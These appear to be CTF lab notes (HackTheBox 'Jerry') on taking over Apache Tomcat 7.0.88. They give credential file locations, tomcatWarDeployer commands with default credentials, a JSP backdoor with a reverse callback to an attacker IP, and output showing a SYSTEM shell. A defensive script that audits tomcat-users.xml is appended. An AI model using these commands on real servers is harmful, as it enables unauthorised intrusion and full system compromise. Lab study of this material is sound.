The Tomcat password is sometimes kept in:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'
Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd to see where the tomcat account's home directory is
tomcatWarDeployer
Vuln: Apache Tomcat/7.0.88
REF: JerryHTB
Example:
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080
If python errors with "no module named 'mechanize'", install it:
>> sudo apt install python-pip
>> pip install mechanize
Run again with creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080
==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO:
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------
SUCCESS!!!!!
http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0
> whoami
nt authority\system
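Defender-side check for the tomcat-users.xml file noted above (added example, not part of the original notes or of tomcatWarDeployer): it lists accounts that hold a Manager role able to deploy WARs and accounts with a weak password. The function name, the weak-password list and the sample XML are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Manager roles that permit WAR deployment (HTML and text interfaces).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Short constructed sample of well-known passwords; extend with your own list.
WEAK_PASSWORDS = {"tomcat", "s3cret", "admin", "manager", "password", "changeit"}

# Constructed sample input, not taken from a real host.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <!-- <user username="old" password="tomcat" roles="manager-gui"/> -->
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
  <user username="deploy" password="Zq7#vR2m!xK9tLw4" roles="manager-script"/>
</tomcat-users>
"""

def local(tag):
    """Strip an XML namespace prefix: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return one finding per <user> that is weakly protected or can deploy."""
    findings = []
    # Commented-out entries are dropped by the parser, so only live users count.
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Older files use name=, newer ones username=.
        user = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        issues = []
        if password.lower() in WEAK_PASSWORDS or password == user:
            issues.append("weak-password")
        if roles & DEPLOY_ROLES:
            issues.append("can-deploy-war")
        if issues:
            findings.append({"user": user, "roles": sorted(roles), "issues": issues})
    return findings

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE):
        print(finding)
```

An account carrying both issues is the case shown in the run above: known credentials plus a deploy-capable Manager role.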